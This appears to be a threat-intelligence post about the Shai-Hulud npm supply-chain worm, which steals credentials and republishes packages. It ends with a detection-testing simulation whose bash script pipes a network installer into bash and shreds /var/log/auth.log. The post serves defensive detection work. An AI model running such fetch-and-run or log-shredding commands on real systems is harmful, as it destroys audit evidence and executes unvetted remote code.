SOC Prime Bias: Critical

28 Nov 2025 18:53

Shai-Hulud: Widespread npm Supply Chain Attack

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

SUMMARY

GitLab disclosed a widespread supply chain intrusion aimed at the npm ecosystem. The campaign pushes an updated Shai-Hulud malware variant via malicious preinstall scripts. This payload harvests cloud and code-host credentials, funnels data to attacker-controlled GitHub repositories, and spreads further by republishing trojanized packages. A built-in dead man’s switch can wipe or corrupt user files if the attacker’s infrastructure is disrupted.

Investigation

GitLab’s vulnerability research team traced the activity to tainted npm packages whose modified package.json references a setup_bun.js loader. This loader installs the Bun runtime and triggers a bundled bun_environment.js payload that collects credentials, runs Trufflehog to discover secrets, and uploads results to a public GitHub repository. The malware also spins up new GitHub repositories as drop boxes and abuses stolen npm tokens to republish compromised packages. If access to both GitHub and npm is severed, the payload proceeds to delete or overwrite user files.

Mitigation

GitLab recommends that organizations inspect npm dependencies for unexpected preinstall scripts and validate the integrity of published packages. Teams should remove unauthorized setup_bun.js loaders, revoke exposed npm and GitHub tokens, and watch for suspicious GitHub repositories stamped with the marker “Sha1-Hulud: The Second Coming.” Endpoint protection should be configured to block untrusted Node scripts and to detect the destructive command lines documented in the report.

Response

When activity is detected, isolate the impacted system, revoke all compromised credentials, and purge malicious npm packages from internal registries. Perform a forensic review to confirm or rule out data exfiltration and file destruction. Issue fresh credentials for cloud platforms and GitHub, and continuously monitor GitHub for newly created repositories that match the attacker’s marker. Finally, reinforce CI/CD pipelines to prohibit arbitrary preinstall scripts.

Attack Flow

Simulations

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Attack Narrative & Commands

The adversary has gained a foothold on the compromised Linux host. To establish a persistent runtime capable of executing further JavaScript‑based payloads, they download and install the Bun runtime via a one‑liner that streams the installer directly into bash. Immediately after confirming the runtime is present, the attacker triggers a “dead‑man’s switch” (simulated here by a timed sleep) that launches a destructive shred operation to irrecoverably delete a sensitive file (/var/log/auth.log).

The steps are:

  1. Download & install Bun:
    curl -fsSL https://bun.sh/install | bash
  2. Wait briefly (simulating the switch timing).
  3. Execute destructive shred:
    shred -uvz -n 1 /var/log/auth.log

Both commands generate process‑creation events that match the Sigma rule’s exact keywords.

Regression Test Script

#!/bin/bash
# -------------------------------------------------
# Simulate Shai‑Hulud “Bun install + shred” behavior
# -------------------------------------------------

# 1️⃣ Install Bun (exact command required for detection)
echo "[*] Installing Bun runtime..."
curl -fsSL https://bun.sh/install | bash

# Short pause to emulate realistic timing
sleep 5

# 2️⃣ Perform destructive file wipe (exact command required)
TARGET_FILE="/var/log/auth.log"
if [[ -f "$TARGET_FILE" ]]; then
    echo "[*] Shredding $TARGET_FILE ..."
    shred -uvz -n 1 "$TARGET_FILE"
else
    echo "[!] Target file not found; creating dummy file for demo."
    echo "dummy data" > "$TARGET_FILE"
    shred -uvz -n 1 "$TARGET_FILE"
fi

echo "[*] Simulation complete."

Cleanup Commands

#!/bin/bash
# -------------------------------------------------
# Cleanup after the Bun/Shred simulation
# -------------------------------------------------

# Remove any residual Bun files (if installed)
if command -v bun >/dev/null 2>&1; then
    echo "[*] Removing Bun runtime..."
    rm -rf "$HOME/.bun"
    rm -f /usr/local/bin/bun
fi

# Recreate the shredded log file (for system stability)
TARGET_FILE="/var/log/auth.log"
if [[ ! -f "$TARGET_FILE" ]]; then
    echo "recreated log placeholder" | sudo tee "$TARGET_FILE" >/dev/null
    sudo chmod 600 "$TARGET_FILE"
fi

echo "[*] Cleanup complete."